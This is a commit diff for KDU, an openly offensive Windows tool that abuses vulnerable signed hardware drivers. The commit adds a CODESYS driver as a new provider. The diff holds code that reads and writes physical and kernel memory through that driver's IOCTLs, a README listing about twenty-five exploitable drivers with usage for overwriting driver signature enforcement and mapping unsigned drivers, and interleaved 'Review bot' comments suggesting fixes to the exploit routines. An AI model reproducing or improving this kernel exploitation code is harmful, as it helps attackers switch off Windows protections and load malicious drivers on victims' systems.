v 1.2.6
Added CODESYS SysDrv3S as provider 24
Some minor changes
Readme updated to include MSFT blacklist notice in the table of the supported providers
hfiref0x committed Oct 16, 2022
1 parent 7d3e633 commit f1416c8
Showing 53 changed files with 327 additions and 166 deletions.
Binary file modified Bin/drv64.dll
Binary file not shown.
Binary file modified Bin/kdu.exe
Binary file not shown.
109 changes: 55 additions & 54 deletions KDU.sha256

Large diffs are not rendered by default.

57 changes: 31 additions & 26 deletions README.md
Expand Up @@ -20,11 +20,13 @@ It features:
#### Usage

###### KDU -list
###### KDU -diag
###### KDU -prv ProviderID
###### KDU -ps ProcessID
###### KDU -dse value
###### KDU -map filename
* -list - list currently available providers;
* -diag - run system diagnostic for troubleshooting;
* -prv - optional, select vulnerability driver provider;
* -ps - modify process object of given ProcessID;
* -dse - write user defined value to the system DSE state flags;
Expand Down Expand Up @@ -97,32 +99,35 @@ You use it at your own risk. Some lazy AV may flag this tool as hacktool/malware

# Currently Supported Providers

| Provider Id | Product Vendor | Driver | Software package | Code base | Version |
|-------------|----------------|-------------|------------------------------------|-------------------|-----------------------------|
| 0 | Intel | IQVM64/Nal | Network Adapter Diagnostic Driver | Original | 1.03.0.7 |
| 1 | MSI | RTCore64 | MSI Afterburner | Semi-original | 4.6.2 build 15658 and below |
| 2 | Gigabyte | Gdrv | Gigabyte TOOLS | MAPMEM NTDDK 3.51 | Undefined |
| 3 | ASUSTeK | ATSZIO64 | ASUSTeK WinFlash utility | Semi-original | Undefined |
| 4 | Patriot | MsIo64 | Patriot Viper RGB utility | WINIO | 1.0 |
| 5 | ASRock | GLCKIO2 | ASRock Polychrome RGB | WINIO | 1.0.4 |
| 6 | G.SKILL | EneIo64 | G.SKILL Trident Z Lighting Control | WINIO | 1.00.08 |
| 7 | EVGA | WinRing0x64 | EVGA Precision X1 | WINRING0 | 1.0.2.0 |
| 8 | Thermaltake | EneTechIo64 | Thermaltake TOUGHRAM software | WINIO | 1.0.3 |
| 9 | Huawei | PhyMemx64 | Huawei MateBook Manager software | WINIO | Undefined |
| 10 | Realtek | RtkIo64 | Realtek Dash Client Utility | PHYMEM | Various |
| 11 | MSI | EneTechIo64 | MSI Dragon Center | WINIO | Various |
| 12 | LG | LHA | LG Device Manager | Semi-original | 1.6.0.2 |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | WINIO | 2.1.7.1 and below |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | Original | 10.1 and below |
| 15 | GMER | GmerDrv | Gmer "Antirootkit" | Original | 2.2 and below |
| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | Original | 2.3 and below |
| 17 | Benjamin Delpy | Mimidrv | Mimikatz | Original | 2.2 and below |
| 18 | Wen Jia Liu | KProcessHacker2 | Process Hacker | Original | 2.38 and below |
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below |
| 22 | ASUSTeK | AsIO3 | ASUS GPU TweakII | WINIO | 2.3.0.3 |
| 23 | Marvin | Hw | Marvin Hardware Access Driver | Original | 4.9 and below |
| Provider Id | Product Vendor | Driver | Software package | Code base | Version | MSFT blacklisted by* |
|-------------|----------------|-------------|------------------------------------|-------------------|-----------------------------|----------------------|
| 0 | Intel | IQVM64/Nal | Network Adapter Diagnostic Driver | Original | 1.03.0.7 | Cert |
| 1 | MSI | RTCore64 | MSI Afterburner | Semi-original | 4.6.2 build 15658 and below | |
| 2 | Gigabyte | Gdrv | Gigabyte TOOLS | MAPMEM | Undefined | Name |
| 3 | ASUSTeK | ATSZIO64 | ASUSTeK WinFlash utility | Semi-original | Undefined | Name |
| 4 | Patriot | MsIo64 | Patriot Viper RGB utility | WINIO | 1.0 | Page hash |
| 5 | ASRock | GLCKIO2 | ASRock Polychrome RGB | WINIO | 1.0.4 | Page hash |
| 6 | G.SKILL | EneIo64 | G.SKILL Trident Z Lighting Control | WINIO | 1.00.08 | Cert |
| 7 | EVGA | WinRing0x64 | EVGA Precision X1 | WINRING0 | 1.0.2.0 | Name |
| 8 | Thermaltake | EneTechIo64 | Thermaltake TOUGHRAM software | WINIO | 1.0.3 | Page hash |
| 9 | Huawei | PhyMemx64 | Huawei MateBook Manager software | WINIO | Undefined | Name, Page hash |
| 10 | Realtek | RtkIo64 | Realtek Dash Client Utility | PHYMEM | Various | Name |
| 11 | MSI | EneTechIo64 | MSI Dragon Center | WINIO | Various | |
| 12 | LG | LHA | LG Device Manager | Semi-original | 1.6.0.2 | Name |
| 13 | ASUSTeK | AsIO2 | ASUS GPU Tweak | WINIO | 2.1.7.1 and below | |
| 14 | PassMark | DirectIo64 | PassMark Performance Test | Original | 10.1 and below | Page hash |
| 15 | GMER | GmerDrv | Gmer "Antirootkit" | Original | 2.2 and below | |
| 16 | Dell | DBUtil_2_3 | Dell BIOS Utility | Original | 2.3 and below | Page hash |
| 17 | Benjamin Delpy | Mimidrv | Mimikatz | Original | 2.2 and below | Cert |
| 18 | Wen Jia Liu | KProcessHacker2 | Process Hacker | Original | 2.38 and below | Name |
| 19 | Microsoft | ProcExp152 | Process Explorer | Original | 1.5.2 and below | |
| 20 | Dell | DBUtilDrv2 | Dell BIOS Utility | Original | 2.7 and below | |
| 21 | DarkByte | Dbk64 | Cheat Engine | Original | 7.4 and below | Cert, Name |
| 22 | ASUSTeK | AsIO3 | ASUS GPU TweakII | WINIO | 2.3.0.3 | |
| 23 | Marvin | Hw | Marvin Hardware Access Driver | Original | 4.9 and below | Name |
| 24 | CODESYS | SysDrv3S | CODESYS SysDrv3S | MAPMEM | 3.5.6 and below | |

###### *At commit time, data maybe inaccurate.

More providers maybe added in the future.
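
Review bot: the new "MSFT blacklisted by*" column uses the values Cert, Name and Page hash without defining them, and an empty cell does not say whether the driver is not blocked or simply was not checked. A one-line legend under the table would settle both. The footnote "At commit time, data maybe inaccurate." should read "may be", and it would be more useful with the date or blocklist version the data was checked against. Row 2 also changes its code base from "MAPMEM NTDDK 3.51" to "MAPMEM" without a mention in the commit message; if that is only to match the new row 24, say so.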

4 changes: 2 additions & 2 deletions Source/Hamakaze/KDU.vcxproj.user
@@ -1,11 +1,11 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LocalDebuggerCommandArguments>-diag</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 24 -map c:\OpA22\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LocalDebuggerCommandArguments>-list</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments>-prv 24 -map c:\OpA22\dummy.sys</LocalDebuggerCommandArguments>
<DebuggerFlavor>WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>
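
Review bot: both the Debug|x64 and Release|x64 PropertyGroups now set LocalDebuggerCommandArguments to "-prv 24 -map c:\OpA22\dummy.sys", a path that exists only on the committer's machine. A .vcxproj.user file holds per-user debugger settings, so this looks like a local test configuration committed by accident; keep the previous neutral arguments (-diag, -list) or leave the file out of the commit.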
9 changes: 5 additions & 4 deletions Source/Hamakaze/consts.h
Expand Up @@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
* VERSION: 1.25
* VERSION: 1.26
*
* DATE: 17 Aug 2022
* DATE: 16 Oct 2022
*
* Global consts.
*
Expand All @@ -21,8 +21,8 @@

#define KDU_VERSION_MAJOR 1
#define KDU_VERSION_MINOR 2
#define KDU_VERSION_REVISION 5
#define KDU_VERSION_BUILD 2208
#define KDU_VERSION_REVISION 6
#define KDU_VERSION_BUILD 2210

#define KDU_BASE_ID 0xff123456
#define KDU_SYNC_MUTANT 0xabcd
Expand Down Expand Up @@ -86,3 +86,4 @@
#define IDR_DBK64 124
#define IDR_ASUSIO3 125
#define IDR_HW64 126
#define IDR_SYSDRV3S 127
76 changes: 46 additions & 30 deletions Source/Hamakaze/idrv/mapmem.cpp
@@ -1,12 +1,12 @@
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2020 - 2021
* (C) COPYRIGHT AUTHORS, 2020 - 2022
*
* TITLE: MAPMEM.CPP
*
* VERSION: 1.11
* VERSION: 1.26
*
* DATE: 19 Apr 2021
* DATE: 15 Oct 2022
*
* MAPMEM driver routines.
*
Expand All @@ -21,7 +21,7 @@
#include "idrv/mapmem.h"

//
// Gigabyte driver based on MAPMEM.SYS Microsoft Windows NT 3.51 DDK example from 1993.
// Gigabyte/CODESYS/SuperBMC/etc drivers are based on MAPMEM.SYS Microsoft Windows NT 3.51 DDK example from 1993.
//

ULONG g_MapMem_MapIoctl;
Expand All @@ -42,10 +42,16 @@ PVOID MapMemMapMemory(
{
PVOID pMapSection = NULL;
MAPMEM_PHYSICAL_MEMORY_INFO request;
ULONG_PTR offset;
ULONG mapSize;

RtlSecureZeroMemory(&request, sizeof(request));
request.BusAddress.QuadPart = PhysicalAddress;
request.Length = NumberOfBytes;

offset = PhysicalAddress & ~(PAGE_SIZE - 1);
mapSize = (ULONG)(PhysicalAddress - offset) + NumberOfBytes;

request.BusAddress.QuadPart = offset;
request.Length = mapSize;

if (supCallDriver(DeviceHandle,
g_MapMem_MapIoctl,
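
Review bot: in MapMemMapMemory the new local "offset" holds the page-aligned base address (PhysicalAddress & ~(PAGE_SIZE - 1)), not an offset, while the local of the same name added to MapMemReadWritePhysicalMemory holds the in-page remainder. Rename this one (for example to a page-base name) so the two are not confused. The sum for mapSize is stored in a ULONG, so "(ULONG)(PhysicalAddress - offset) + NumberOfBytes" can wrap when NumberOfBytes is within a page of the ULONG maximum; check for that before filling in request.Length. A short comment stating that the request is now rounded down to a page boundary, and that the caller must add the remainder to the returned pointer, would document the changed contract.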
Expand Down Expand Up @@ -129,14 +135,14 @@ BOOL WINAPI GioVirtualToPhysicalEx(
}

/*
* GioQueryPML4Value
* MapMemQueryPML4Value
*
* Purpose:
*
* Locate PML4.
*
*/
BOOL WINAPI GioQueryPML4Value(
BOOL WINAPI MapMemQueryPML4Value(
_In_ HANDLE DeviceHandle,
_Out_ ULONG_PTR* Value)
{
Expand Down Expand Up @@ -165,34 +171,34 @@ BOOL WINAPI GioQueryPML4Value(
}

/*
* GioVirtualToPhysical
* MapMemVirtualToPhysical
*
* Purpose:
*
* Translate virtual address to the physical.
*
*/
BOOL WINAPI GioVirtualToPhysical(
BOOL WINAPI MapMemVirtualToPhysical(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR VirtualAddress,
_Out_ ULONG_PTR* PhysicalAddress)
{
return PwVirtualToPhysical(DeviceHandle,
GioQueryPML4Value,
GioReadPhysicalMemory,
MapMemQueryPML4Value,
MapMemReadPhysicalMemory,
VirtualAddress,
PhysicalAddress);
}

/*
* GioReadWritePhysicalMemory
* MapMemReadWritePhysicalMemory
*
* Purpose:
*
* Read/Write physical memory.
*
*/
BOOL WINAPI GioReadWritePhysicalMemory(
BOOL WINAPI MapMemReadWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
Expand All @@ -203,6 +209,8 @@ BOOL WINAPI GioReadWritePhysicalMemory(
DWORD dwError = ERROR_SUCCESS;
PVOID mappedSection = NULL;

ULONG_PTR offset;

//
// Map physical memory section.
//
Expand All @@ -212,13 +220,15 @@ BOOL WINAPI GioReadWritePhysicalMemory(

if (mappedSection) {

offset = PhysicalAddress - (PhysicalAddress & ~(PAGE_SIZE - 1));

__try {

if (DoWrite) {
RtlCopyMemory(mappedSection, Buffer, NumberOfBytes);
RtlCopyMemory(RtlOffsetToPointer(mappedSection, offset), Buffer, NumberOfBytes);
}
else {
RtlCopyMemory(Buffer, mappedSection, NumberOfBytes);
RtlCopyMemory(Buffer, RtlOffsetToPointer(mappedSection, offset), NumberOfBytes);
}

bResult = TRUE;
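
Review bot: the in-page offset computed before the __try block repeats the rounding that MapMemMapMemory already performs, so the two RtlCopyMemory calls are only correct while both functions round the same way. "PhysicalAddress & (PAGE_SIZE - 1)" expresses the remainder directly, and it would be safer still to have MapMemMapMemory return the already adjusted pointer (or the offset as an out parameter) so that the rounding lives in one place. Nothing in this hunk documents that mappedSection now points at the page base rather than at PhysicalAddress; add that to the "Map physical memory section" comment.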
Expand All @@ -245,56 +255,56 @@ BOOL WINAPI GioReadWritePhysicalMemory(
}

/*
* GioReadPhysicalMemory
* MapMemReadPhysicalMemory
*
* Purpose:
*
* Read from physical memory.
*
*/
BOOL WINAPI GioReadPhysicalMemory(
BOOL WINAPI MapMemReadPhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_ PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return GioReadWritePhysicalMemory(DeviceHandle,
return MapMemReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
FALSE);
}

/*
* GioWritePhysicalMemory
* MapMemWritePhysicalMemory
*
* Purpose:
*
* Write to physical memory.
*
*/
BOOL WINAPI GioWritePhysicalMemory(
BOOL WINAPI MapMemWritePhysicalMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR PhysicalAddress,
_In_reads_bytes_(NumberOfBytes) PVOID Buffer,
_In_ ULONG NumberOfBytes)
{
return GioReadWritePhysicalMemory(DeviceHandle,
return MapMemReadWritePhysicalMemory(DeviceHandle,
PhysicalAddress,
Buffer,
NumberOfBytes,
TRUE);
}

/*
* GioWriteKernelVirtualMemory
* MapMemWriteKernelVirtualMemory
*
* Purpose:
*
* Write virtual memory via GDRV.
*
*/
BOOL WINAPI GioWriteKernelVirtualMemory(
BOOL WINAPI MapMemWriteKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
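
Review bot: the functions are renamed from Gio* to MapMem*, but the header comment of MapMemWriteKernelVirtualMemory still reads "Write virtual memory via GDRV.", which is no longer accurate now that the file serves several drivers; update it along with the rename. While these signatures are being touched, the SAL annotations deserve a look: MapMemReadPhysicalMemory declares its destination as "_In_ PVOID Buffer", and MapMemWriteKernelVirtualMemory declares its source buffer as "_Out_writes_bytes_(NumberOfBytes)", both of which describe the opposite direction from what the routine does.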
Expand All @@ -305,13 +315,13 @@ BOOL WINAPI GioWriteKernelVirtualMemory(

SetLastError(ERROR_SUCCESS);

bResult = GioVirtualToPhysical(DeviceHandle,
bResult = MapMemVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);

if (bResult) {

bResult = GioReadWritePhysicalMemory(DeviceHandle,
bResult = MapMemReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
Expand All @@ -323,14 +333,14 @@ BOOL WINAPI GioWriteKernelVirtualMemory(
}

/*
* GioReadKernelVirtualMemory
* MapMemReadKernelVirtualMemory
*
* Purpose:
*
* Read virtual memory via GDRV.
*
*/
BOOL WINAPI GioReadKernelVirtualMemory(
BOOL WINAPI MapMemReadKernelVirtualMemory(
_In_ HANDLE DeviceHandle,
_In_ ULONG_PTR Address,
_Out_writes_bytes_(NumberOfBytes) PVOID Buffer,
Expand All @@ -341,13 +351,13 @@ BOOL WINAPI GioReadKernelVirtualMemory(

SetLastError(ERROR_SUCCESS);

bResult = GioVirtualToPhysical(DeviceHandle,
bResult = MapMemVirtualToPhysical(DeviceHandle,
Address,
&physicalAddress);

if (bResult) {

bResult = GioReadWritePhysicalMemory(DeviceHandle,
bResult = MapMemReadWritePhysicalMemory(DeviceHandle,
physicalAddress,
Buffer,
NumberOfBytes,
Expand Down Expand Up @@ -375,6 +385,12 @@ BOOL WINAPI MapMemRegisterDriver(
UNREFERENCED_PARAMETER(DeviceHandle);

switch (DriverId) {

case IDR_SYSDRV3S:
g_MapMem_MapIoctl = IOCTL_MAPMEM_MAP_USER_PHYSICAL_MEMORY;
g_MapMem_UnmapIoctl = IOCTL_MAPMEM_UNMAP_USER_PHYSICAL_MEMORY;
break;

case IDR_GDRV:
default:
g_MapMem_MapIoctl = IOCTL_GDRV_MAP_USER_PHYSICAL_MEMORY;
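
Review bot: in the DriverId switch, "default:" still shares the IDR_GDRV branch, so any identifier other than IDR_SYSDRV3S silently gets the Gigabyte IOCTL codes. With more than one MAPMEM-based driver registered through this function, an unrecognized DriverId should be treated as an error (the function returns BOOL) rather than falling through to one vendor's codes. The new case is also placed ahead of IDR_GDRV; listing cases in identifier order with default last would read more naturally.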